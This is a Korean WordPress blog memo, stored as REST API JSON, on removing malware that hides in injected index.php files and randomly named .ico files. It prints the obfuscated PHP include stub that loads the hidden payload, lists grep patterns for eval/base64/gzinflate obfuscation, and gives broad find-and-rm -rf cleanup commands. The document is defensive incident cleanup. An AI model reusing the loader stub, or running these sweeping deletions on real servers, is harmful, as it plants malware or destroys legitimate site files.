www-data index.php \ud30c\uc77c\uc774\ub098<\/p>\n
.2ec67e7e.ico \uc774\ub7f0 ico \ud30c\uc77c\ub4e4\uc774 \uc0dd\uc131\ub41c \uacbd\uc6b0, wordpress plugin \ub4f1\uc5d0\uc11c \uc720\uc785\ub41c \uba40\uc6e8\uc5b4\ub97c \uc758\uc2ec\ud574\uc57c\ud55c\ub2e4.<\/p>\n
\uc6cc\ub4dc\ud504\ub808\uc2a4\uac00 \uc124\uce58\ub41c \uc11c\ubc84\uc5d0\ub294 \uc804\uccb4\uc801\uc73c\ub85c \uc801\uc6a9\ub418\ub294 \uc0ac\uc548\uc774\ub2e4. \uadc0\ucc2c..<\/p>\n
\uc77c\ub2e8 \uc6d0\ucc9c\ubd09\uc1c4\ub294 \ub4a4\ub85c\ud558\uace0 \ud30c\uc77c\ub4e4\uc744 \ucc3e\uc544\uc11c \uc81c\uac70\ud558\uc790.<\/p>\n
index.php \uc758 \ub0b4\uc6a9\uc740 \uc774\ub807\ub2e4.<\/p>\n
<?php\r\n\/*5693b*\/\r\n\r\n@include \"\\057ho\\155e\/.\\144d5\\0640e\\0670.\\151co\";\r\n\r\n\/*5693b*\/<\/pre>\nunphp.net \uc5d0\uc11c \ud480\uc5b4\ubcf4\uba74.. ico\ud30c\uc77c include\ud558\ub294 \ud615\ud0dc.. \ub9cc\ub4e0\ub188 \ub098\uac00 \uc8fd\uc5c8\uc73c\uba74..<\/p>\n
find -name index.php
\nfind -name index.php -exec rm -rf {} \\;<\/p>\nfind -name “*.ico” | egrep ‘.[1-z]{8}.ico’
\nfind -name “*.ico” | egrep ‘.[1-z]{8}.ico’ | xargs rm -rf<\/p>\nfind -name “*.php” | egrep ‘\\.[1-z]{8}.php’
\nfind -name “*.php” | egrep ‘\\.[1-z]{8}.php’ | xargs rm -rf<\/p>\nfind . -type d -name ‘forum’
\nfind . -type d -name ‘forum’ | xargs rm -rf<\/p>\nfind . -type d -name ‘journal’
\nfind . -type d -name ‘journal’ | xargs rm -rf<\/p>\n\uc774\ub7f0\uac83\ub4e4 \ucc3e\uc544\uc11c \uc81c\uac70\ud574\uc8fc\uba74 \ub418\uaca0\ub294\ub370 php \ud30c\uc77c\ub4e4\uc740 \ub0a0\ub9ac\uae30\uc804\uc5d0 \uccb4\ud06c\ud55c\ubc88\uc529 \ud574\ubcf4\uace0..<\/p>\n
\uc5c4\ud55c\uac70 \uc9c0\uc6b0\uba74 \uace8\uce58\uc544\ud504\ub2c8\uae4c<\/p>\n
find . -type f -name ‘*.php’ | xargs grep -l ” *=PHP_VERSION *”
\nfind . -type f -name ‘*.php’ | xargs grep -l ” *Phar::interceptFileFuncs() *”
\nfind . -type f -name ‘*.php’ | xargs grep -l ” *@include *”
\nfind . -type f -name ‘*.php’ | xargs grep -l ” *interceptFileFuncs *”
\nfind . -type f -name ‘*.php’ | xargs grep -l ” *eval *( *gzinflate *( *base64_decode *( *”
\nfind . -type f -name ‘*.php’ | xargs grep -l ” *base64_decode *”
\nfind . -type f -name ‘*.php’ | xargs grep -l ” *function *wscandir *”
\nfind . -type f -name ‘*.php’ | xargs grep -l ” *HTTP\/1.0 *404 *Not *Found *”
\nfind . -type f -name ‘*.php’ | xargs grep -l ” *@gzuncompress *”
\nfind . -type f -name ‘*.php’ | xargs grep -l ” *Array *( *) *; *global *”
\nfind . -type f -name ‘*.php’ | xargs grep -l ” *@unserialize *”<\/p>\n","protected":false},"excerpt":{"rendered":"www-data index.php \ud30c\uc77c\uc774\ub098 .2ec67e7e.ico \uc774\ub7f0 ico \ud30c\uc77c\ub4e4\uc774 \uc0dd\uc131\ub41c \uacbd\uc6b0, wordpress plugin \ub4f1\uc5d0\uc11c \uc720\uc785\ub41c \uba40\uc6e8\uc5b4\ub97c \uc758\uc2ec\ud574\uc57c\ud55c\ub2e4. \uc6cc\ub4dc\ud504\ub808\uc2a4\uac00 \uc124\uce58\ub41c \uc11c\ubc84\uc5d0\ub294 \uc804\uccb4\uc801\uc73c\ub85c \uc801\uc6a9\ub418\ub294 \uc0ac\uc548\uc774\ub2e4. \uadc0\ucc2c.. \uc77c\ub2e8 \uc6d0\ucc9c\ubd09\uc1c4\ub294 \ub4a4\ub85c\ud558\uace0 \ud30c\uc77c\ub4e4\uc744 \ucc3e\uc544\uc11c \uc81c\uac70\ud558\uc790. index.php \uc758 \ub0b4\uc6a9\uc740 \uc774\ub807\ub2e4. <?php \/*5693b*\/ @include “\\057ho\\155e\/.\\144d5\\0640e\\0670.\\151co”; \/*5693b*\/ unphp.net \uc5d0\uc11c \ud480\uc5b4\ubcf4\uba74.. ico\ud30c\uc77c include\ud558\ub294 \ud615\ud0dc.. \ub9cc\ub4e0\ub188 \ub098\uac00 \uc8fd\uc5c8\uc73c\uba74.. find -name index.php find -name index.php -exec rm -rf {} \\; find -name “*.ico” | egrep ‘.[1-z]{8}.ico’ find -name “*.ico” | egrep ‘.[1-z]{8}.ico’ | xargs rm -rf find -name “*.php” | egrep ‘\\.[1-z]{8}.php’ find -name “*.php” | egrep ‘\\.[1-z]{8}.php’ | xargs rm -rf find . -type d -name ‘forum’ find . -type d -name ‘forum’ | xargs rm -rf find . -type d -name ‘journal’ find . -type d -name ‘journal’ | xargs rm -rf \uc774\ub7f0\uac83\ub4e4 \ucc3e\uc544\uc11c \uc81c\uac70\ud574\uc8fc\uba74 \ub418\uaca0\ub294\ub370 php \ud30c\uc77c\ub4e4\uc740 \ub0a0\ub9ac\uae30\uc804\uc5d0 \uccb4\ud06c\ud55c\ubc88\uc529 \ud574\ubcf4\uace0.. \uc5c4\ud55c\uac70 \uc9c0\uc6b0\uba74 \uace8\uce58\uc544\ud504\ub2c8\uae4c find . -type f -name ‘*.php’ | xargs grep -l ” *=PHP_VERSION *” find . -type f -name ‘*.php’ | xargs grep -l ” *Phar::interceptFileFuncs() *” find . -type f -name ‘*.php’ | xargs grep -l ” *@include *” find . -type f -name ‘*.php’ | xargs grep -l ” *interceptFileFuncs *” find . -type f -name ‘*.php’ | xargs grep -l ” *eval *( *gzinflate *(\ub354\ubcf4\uae30…<\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[5],"tags":[],"class_list":["post-475","post","type-post","status-publish","format-standard","hentry","category-memo"],"_links":{"self":[{"href":"http:\/\/www.bluebee.co.kr\/index.php?rest_route=\/wp\/v2\/posts\/475","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.bluebee.co.kr\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.bluebee.co.kr\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.bluebee.co.kr\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/www.bluebee.co.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=475"}],"version-history":[{"count":1,"href":"http:\/\/www.bluebee.co.kr\/index.php?rest_route=\/wp\/v2\/posts\/475\/revisions"}],"predecessor-version":[{"id":476,"href":"http:\/\/www.bluebee.co.kr\/index.php?rest_route=\/wp\/v2\/posts\/475\/revisions\/476"}],"wp:attachment":[{"href":"http:\/\/www.bluebee.co.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=475"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.bluebee.co.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=475"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.bluebee.co.kr\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=475"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}